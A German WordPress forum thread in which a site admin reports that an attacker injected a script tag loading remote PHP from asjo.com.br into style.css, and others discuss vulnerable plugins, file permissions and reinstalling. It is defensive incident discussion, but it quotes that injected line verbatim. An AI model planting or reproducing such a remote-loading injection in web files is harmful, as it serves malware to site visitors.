Warnung vor aktuellem Hack

  • Hallo,

    heute ist es jemandem gelungen, als erste Zeile in style.css das hier einzutragen (Nicht klicken!):

    Code
    <script type="text/javascript" src="http://asjo.com.br/js/Check.php"></script>

    Wir benutzen dabei relativ wenige Plugins (und auch nur bekannte), alles ist auf aktuellem Stand.

    Ich bin daher momentan etwas ratlos, wie ich einen neuerlichen Eintrag verhindern kann.

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Das ist ne gute Frage. Welche Plugins laufen denn? Welche Wordpress Version ist installiert?

    Generell würde ich an deiner Stelle die Rechte etwas enger setzen, so das erst gar nicht in die Datei geschrieben werden kann. Ich erteile dem upload und upgrade Verzeichnis auch nur Schreibrechte, wenn erforderlich.

  • Ach über timthumb sind wir längst hinaus :-) . Nee, das war's nicht.

    Ich habe mal WP Clean-Fix deaktiviert, aber im Grunde verwenden wir nur weit verbreitete Plugins. Das Basis Framework ist Genesis von Studiopress.

    Das sind die Plugins:
    Ambrosite Next/Previous Post Link Plus
    Antispam Bee
    BackWPup
    Custom Post Type UI
    Genesis Featured Widget Amplified
    Genesis Simple Hooks
    Google XML Sitemaps
    Gravity Forms
    Hotfix
    Limit Login Attempts
    MCE Table Buttons
    Redirection
    Secure WordPress
    WordPress Database Backup
    WP-CleanUmlauts2
    WP-Cycle
    wp-jquery-lightbox
    WP CleanFix
    wpCompressor
    WPtouch Pro

    Das Thema stammt auch von Studiopress und ist ein Child Theme deren Frameworks. Sonst gibt's nur noch das Twenty Eleven am Server (als Fallback Theme).

    Die Dateirechte sind auch kein offenes Scheunentor (also nicht 777).

    Wie gesagt, es ist mir ein Rätsel. Natürlich kann der Typ auch über den Server eingebrochen sein. Aber der ISP hat an sich einen sehr guten Ruf.

    http://www.ewerkzeug.info/ - Tipps zu Wordpress, Suchmaschinen, Newsletter und mehr.

    Einmal editiert, zuletzt von hedu (4. Juni 2012 um 21:17)

  • Bei BackWPup 2.1.4 ist eine Sicherheitslücke bekannt bzw. es existiert wohl auch ein Exploit. Welche Version hast du?

    Nein, mit den Rechten meine ich eher dem Benutzer, unter dem der Webserver läuft, die Schreibrechte zu entziehen z.B Dateien 440, Verzeichnisse 550, wo benötigt natürlich höher.


  • BackWPup
    Genesis Simple Hooks
    WP-Cycle
    WPtouch Pro

    Die o.g würde ich noch mal prüfen..

    Zurzeit laufen bei mir Angriffe auf uploadify.php was in den unterschiedlichsten Plugins verwendet wird.

    Wp-Cycle kenne ich nur als Theme und hat eine Sicherheitslücke *über die du schon hinaus* bist :)

    Ansonsten würde ich darauf tippen, dass du eine gehackte Wordpress Version mit nicht entfernten Schadcode hast.

    Wenn dein System gehackt wurde kannst du keiner Datei mehr trauen. D.h. evtl. sind noch fremde Scripte -änderungen aktiv.

    Viel Glück

    ralf

    Mit offenen Augen träumen

  • BackWPup habe ich Version 2.1.11 (aktuelle Version), wie alle anderen Plugins auch in neuster Version laufen.

    Die Simple Hooks werde ich rauswerfen und alles, was ich dort nutze, direkt in functions.php eintragen.

    WP-Cycle (ein Slideshow-Plugin) werde ich auch rauswerfen.

    WPtouch Pro ist ein Problem, das will der Kunde unbedingt.

    Ja, und dann alles neu installieren, seufz.


  • Ja, und dann alles neu installieren, seufz.

    und warum sicherst du das System nicht richtig ab?

    D.h. alles was mit Sicherheit zutun hat, wird bei dir nicht genannt. Meiner Meinung reicht es nicht aus, dass du die Rechte von Dateien prüfst.

    Es gibt Dienstleister, die dir das System absichern können und den Schadcode beseitigen.

    http://www.exploit-db.com/search/?action…tion=Wordpress&

    Viel Glück beim selber suchen!

    ralf

    Mit offenen Augen träumen

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!